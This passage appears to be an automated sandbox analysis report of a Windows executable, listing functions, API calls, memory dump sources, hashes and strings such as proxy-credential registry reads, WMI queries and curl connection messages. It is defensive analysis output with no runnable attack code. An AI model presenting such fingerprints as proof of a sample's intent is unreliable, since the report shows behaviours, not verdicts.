                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__fprintf_l
                                                                                                                                                • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$--:--:--
                                                                                                                                                • API String ID: 2274657414-1858174321
                                                                                                                                                • Opcode ID: 4ad216edb1efe125fa54dc4547722f8effefd6d15e60853d68dadab834fbffcd
                                                                                                                                                • Instruction ID: 1c9a013f001e2e8857519af178cab9018db1dda18a126386f037f9154e27a785
                                                                                                                                                • Opcode Fuzzy Hash: 4ad216edb1efe125fa54dc4547722f8effefd6d15e60853d68dadab834fbffcd
                                                                                                                                                • Instruction Fuzzy Hash: 3731D8B2500208BEFF255E2A8C02FFF3E6DEBC5B54F10801ABD04A9181D6B99D109679
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004C08F0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 157COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen_strncmp
                                                                                                                                                • String ID: ../$/..$/../$/./
                                                                                                                                                • API String ID: 2202561641-456519384
                                                                                                                                                • Opcode ID: 57a11275e05107d5c2e3bc45e89924c921d0fdb577c2a7f0e44e842921c8f5d5
                                                                                                                                                • Instruction ID: 2a9eb74c0010382e6a9c0f94d66219e75d5063870ed275114ebd33133e286e1b
                                                                                                                                                • Opcode Fuzzy Hash: 57a11275e05107d5c2e3bc45e89924c921d0fdb577c2a7f0e44e842921c8f5d5
                                                                                                                                                • Instruction Fuzzy Hash: EA412879508342EEFB6157665C06F7B6F98DF22350F24002FED8551283EA7E8941929E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040E0BB, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 98registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040E0C0
                                                                                                                                                • _memset.LIBCMT ref: 0040E0E7
                                                                                                                                                • _memset.LIBCMT ref: 0040E0FC
                                                                                                                                                  • Part of subcall function 0040D892: __vsnprintf.LIBCMT ref: 0040D8C9
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00000000,0050EB7C), ref: 0040E148
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0050EB7C), ref: 0040E1DA
                                                                                                                                                  • Part of subcall function 0040F6CC: RegQueryValueExW.ADVAPI32(00000050,0040DF01,00000000,?,?,?,?,?,0040DF01,00000050), ref: 0040F6EC
                                                                                                                                                  • Part of subcall function 0040F665: RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?,?,?,00412081,?,?,00000000,?,?,004FC0BC,00000000), ref: 0040F686
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValue_memset$CloseH_prologOpen__vsnprintf
                                                                                                                                                • String ID: Proxy Authorization$Proxy Password$Proxy User$Software\Kingsoft\KVip\%d$|P
                                                                                                                                                • API String ID: 4194701713-1788933088
                                                                                                                                                • Opcode ID: aa894a14442030cd0f7e5afada8520e77f4a5378fd3468e3713c755626575fe3
                                                                                                                                                • Instruction ID: 83742770093a2a4c7377dc355f655d677f570305fdad84f77b4d6d6abf606318
                                                                                                                                                • Opcode Fuzzy Hash: aa894a14442030cd0f7e5afada8520e77f4a5378fd3468e3713c755626575fe3
                                                                                                                                                • Instruction Fuzzy Hash: CF315DB2D0011EABDB10EF95CD81AEEB7B8EF08304F10447AF615F2281D7745A588BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B118B, Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 497COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen
                                                                                                                                                • String ID: %s://%s$Found connection %ld, with requests in the pipe (%zu)$No connections available.$Re-using existing connection! (#%ld) with %s %s$We can reuse, but we want a new connection anyway$host$memory shortage$proxy
                                                                                                                                                • API String ID: 4218353326-2522828998
                                                                                                                                                • Opcode ID: e636650e67e96ad428f134a941a6ebc51505305611326be4d5b70f7987deeeaa
                                                                                                                                                • Instruction ID: 0629f43861695122e28beef394b88588eb26e683bcd081b77cbc39b1ee6ffb03
                                                                                                                                                • Opcode Fuzzy Hash: e636650e67e96ad428f134a941a6ebc51505305611326be4d5b70f7987deeeaa
                                                                                                                                                • Instruction Fuzzy Hash: 9F126E71A00215AFDB15DF64C8947EEBBB4FF08315F54416BE909EB261DB389940CBA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041462E, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 208comCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,0041C8BA,00000002,?,?), ref: 0041464C
                                                                                                                                                • CoCreateInstance.OLE32(004F86A4,00000000,00000001,004F85D4,?,?,?,?,?,?,0041C8BA,00000002,?,?), ref: 00414674
                                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,0041C8BA,00000002,?,?), ref: 0041467E
                                                                                                                                                  • Part of subcall function 00414027: __EH_prolog.LIBCMT ref: 0041402C
                                                                                                                                                  • Part of subcall function 00414027: SysAllocString.OLEAUT32(ROOT\CIMV2), ref: 0041405E
                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,0041C8BA,00000002,?), ref: 004146DE
                                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,0041C8BA,00000002,?,?), ref: 004146FF
                                                                                                                                                  • Part of subcall function 00413FC8: __EH_prolog.LIBCMT ref: 00413FCD
                                                                                                                                                  • Part of subcall function 00413FC8: _com_util::ConvertStringToBSTR.COMSUPP ref: 00413FF7
                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004147C7
                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00414803
                                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,0041C8BA,00000002,?,?), ref: 00414856
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Uninitialize$H_prologStringVariant$AllocBlanketClearConvertCreateInitInitializeInstanceProxy_com_util::
                                                                                                                                                • String ID: WQL
                                                                                                                                                • API String ID: 2099336664-1249411209
                                                                                                                                                • Opcode ID: 10be1641b96ce8c0171fd3283910cbdeec3b6d6621caaf846b2129a288b20475
                                                                                                                                                • Instruction ID: 4ebbe4a287fabd5bab023775912cd2af243c91ef235375fd03f28bbfd6f213c3
                                                                                                                                                • Opcode Fuzzy Hash: 10be1641b96ce8c0171fd3283910cbdeec3b6d6621caaf846b2129a288b20475
                                                                                                                                                • Instruction Fuzzy Hash: D8716D74204310AFC710DF55C848DABBBA9FFC9728F10491EF5599B290C738D986CB9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041C16D, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 113fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041C172
                                                                                                                                                  • Part of subcall function 00405CD7: __EH_prolog.LIBCMT ref: 00405CDC
                                                                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,00000000,?,00000000), ref: 0041C204
                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0041C20C
                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0041C236
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C24E
                                                                                                                                                  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
                                                                                                                                                  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
                                                                                                                                                  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
                                                                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0041C279
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C287
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C29F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandle$DeleteExistsH_prologPath$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock
                                                                                                                                                • String ID: |P
                                                                                                                                                • API String ID: 997926422-2149487505
                                                                                                                                                • Opcode ID: e0a14216cb96035f6565a93be4b6b75aa4e33e8b930b331e8e61284d517a2148
                                                                                                                                                • Instruction ID: c5bc3d0ca81e0a753c4878c3fe0d74e14927dbdef6833646577855f0f8973990
                                                                                                                                                • Opcode Fuzzy Hash: e0a14216cb96035f6565a93be4b6b75aa4e33e8b930b331e8e61284d517a2148
                                                                                                                                                • Instruction Fuzzy Hash: FE416A35D40209DFDF119FA8CC85BEEBBB0AF04359F10406AE505B62A1CB799E90CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0049AE92, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 49libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,005002D8,0000000C,0049AFA3,00000000,00000000), ref: 0049AEA3
                                                                                                                                                • GetProcAddress.KERNEL32(?,EncodePointer), ref: 0049AED7
                                                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0049AEE7
                                                                                                                                                • InterlockedIncrement.KERNEL32(0050A468), ref: 0049AF09
                                                                                                                                                • __lock.LIBCMT ref: 0049AF11
                                                                                                                                                • ___addlocaleref.LIBCMT ref: 0049AF30
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                • API String ID: 1036688887-2843748187
                                                                                                                                                • Opcode ID: e1c474768d647904cc92c4c88903e14c53f708d1c675720d0d951d5a9a72d946
                                                                                                                                                • Instruction ID: 9abd897ee4b4358aabb361808043586954bda9d09565c128b7dddba31933434b
                                                                                                                                                • Opcode Fuzzy Hash: e1c474768d647904cc92c4c88903e14c53f708d1c675720d0d951d5a9a72d946
                                                                                                                                                • Instruction Fuzzy Hash: 20118FB09407029FDF10DF7AD805B6ABFE0BF40304F10852EE896A6391DB799901CB6A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0049305A, Relevance: 15.3, APIs: 10, Instructions: 296COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2102423945-0
                                                                                                                                                • Opcode ID: 16e16bc54c40865efb96423d64dff138d074752b2b99fcfd6b80511a95cecb1c
                                                                                                                                                • Instruction ID: 74831f452f762990932c41c5cd873db7958ed63fdb7ddce1eacb14cb3da78b68
                                                                                                                                                • Opcode Fuzzy Hash: 16e16bc54c40865efb96423d64dff138d074752b2b99fcfd6b80511a95cecb1c
                                                                                                                                                • Instruction Fuzzy Hash: C581D471B006049BDF24EF6ECC829AFBBF9AF96314B14457FF411D2292E7789A008759
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0045663A, Relevance: 15.2, APIs: 10, Instructions: 174COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00456660
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0045668A
                                                                                                                                                • GetTickCount.KERNEL32 ref: 004566E8
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0045670A
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0045676C
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00456787
                                                                                                                                                • GetTickCount.KERNEL32 ref: 004567D4
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000001,?,0043F744), ref: 004567F0
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000001,?,0043F744), ref: 004567F7
                                                                                                                                                • GlobalMemoryStatus.KERNEL32 ref: 00456809
                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,00000001,?,0043F744), ref: 0045682F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountTick$CloseCurrentFreeGlobalHandleLibraryMemoryProcessStatus
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2654232908-0
                                                                                                                                                • Opcode ID: fbe8ca40ba3db215de534d00d286d4bfd4e329d6db6f3fb8ca8b31f556348e1e
                                                                                                                                                • Instruction ID: 88774315d0e8f86b32cc6d45917213842936886f929a18a5dd9ff9c65f816292
                                                                                                                                                • Opcode Fuzzy Hash: fbe8ca40ba3db215de534d00d286d4bfd4e329d6db6f3fb8ca8b31f556348e1e
                                                                                                                                                • Instruction Fuzzy Hash: E061A675900209DBDF10EFA4DD88BEE7BB4FF08305F45456AE905A3282DB389948CF69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00404C41, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 175fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00404C46
                                                                                                                                                • _memcmp.LIBCMT ref: 00404CC3
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,-00000004), ref: 00404E34
                                                                                                                                                • __wcsicmp.LIBCMT ref: 00404E57
                                                                                                                                                • __wcsicmp.LIBCMT ref: 00404E76
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __wcsicmp$DeleteFileH_prolog_memcmp
                                                                                                                                                • String ID: dll$exe$|P
                                                                                                                                                • API String ID: 1235803337-2597355190
                                                                                                                                                • Opcode ID: e8a4852f3a2965780106b376abf97b48ef67a45f8b887c2d15c48327a73491c6
                                                                                                                                                • Instruction ID: 6e2091d73e2fffe49f2534cbc516377e711007a4e7da3c2578e825623c8549d9
                                                                                                                                                • Opcode Fuzzy Hash: e8a4852f3a2965780106b376abf97b48ef67a45f8b887c2d15c48327a73491c6
                                                                                                                                                • Instruction Fuzzy Hash: 08616A72D001199BDF21AB65DC417EEB775FF40318F1040BAEA0977292DA396E85CF98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00412996, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 127COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_malloc_printf_strrchr
                                                                                                                                                • String ID: +)A$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=$No enough memory.
                                                                                                                                                • API String ID: 1711662499-3740422276
                                                                                                                                                • Opcode ID: 6c8ea553888cbe60846ec1f6a89ce44cb19381504df270cf33ade7b3f699555c
                                                                                                                                                • Instruction ID: b01aeb84f23958e49c34db4a699e986b72cd8556e53697caac0c2875339ac7ef
                                                                                                                                                • Opcode Fuzzy Hash: 6c8ea553888cbe60846ec1f6a89ce44cb19381504df270cf33ade7b3f699555c
                                                                                                                                                • Instruction Fuzzy Hash: F04125B1E002199FDB14DEA8C9456FEBBB8EF00355F14406FE901E7281C7B89E91C798
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041AC50, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75processCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041AC55
                                                                                                                                                • _memset.LIBCMT ref: 0041AC6B
                                                                                                                                                  • Part of subcall function 0040D892: __vsnprintf.LIBCMT ref: 0040D8C9
                                                                                                                                                • CreateProcessW.KERNEL32 ref: 0041ACCD
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0041ACE7
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0041ACF4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle$CreateH_prologProcess__vsnprintf_memset
                                                                                                                                                • String ID: "%s" %s$D$|P
                                                                                                                                                • API String ID: 2645196505-3168561481
                                                                                                                                                • Opcode ID: 7a336fea46065751543b401d3eb48c558815c9e587084405d7daaf6b32f68047
                                                                                                                                                • Instruction ID: 227bcee839633bdccf328dd2f2704832d306fd05aaf5459cd94fe1b33afdac53
                                                                                                                                                • Opcode Fuzzy Hash: 7a336fea46065751543b401d3eb48c558815c9e587084405d7daaf6b32f68047
                                                                                                                                                • Instruction Fuzzy Hash: 09214972D00218ABCB11DFA9DD41AEEBBB9FF48314F10402AE505B6251D7399E14DBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B6A01, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 158COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcpy_s_strlen
                                                                                                                                                • String ID: 65535$udp
                                                                                                                                                • API String ID: 3603354130-1267037602
